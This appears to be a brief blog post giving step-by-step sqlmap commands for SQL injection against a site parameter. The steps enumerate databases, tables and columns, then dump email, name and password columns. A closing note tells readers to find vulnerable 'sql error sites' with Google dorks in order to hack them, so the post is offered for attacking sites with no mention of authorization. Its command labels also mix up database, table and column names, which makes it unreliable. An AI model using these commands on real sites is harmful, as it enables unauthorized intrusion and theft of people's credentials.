Page Nav

HIDE

Grid

GRID_STYLE

Breaking News

latest

How to use Sqlmap in Parrot opetrating sysytem

  How to use Sqlmap in Parrot o sytem Steps to use sqlmap in Parrot os: sqlmap -u http://testweb.com/listproducts.php?cat...

 

How to use Sqlmap in Parrot o sytem

Steps to use sqlmap in Parrot os:

  1. sqlmap -u http://testweb.com/listproducts.php?cat=1 --dbs

  2. sqlmap -u http://testweb.com/listproducts.php?cat=1 -D tablename --tables

  3. sqlmap -u http://testweb.com/listproducts.php?cat=1 -D tablename-T columnname --columns

  4. sqlmap -u http://testweb.com/listproducts.php?cat=1 -D tablename -T columnname -C email,name,pass --dump

  5. Enjoy!!




Note: Only sql error sites can be hacked with this method.You can find sql error sites by google drocks and you can find google drocks from here.



No comments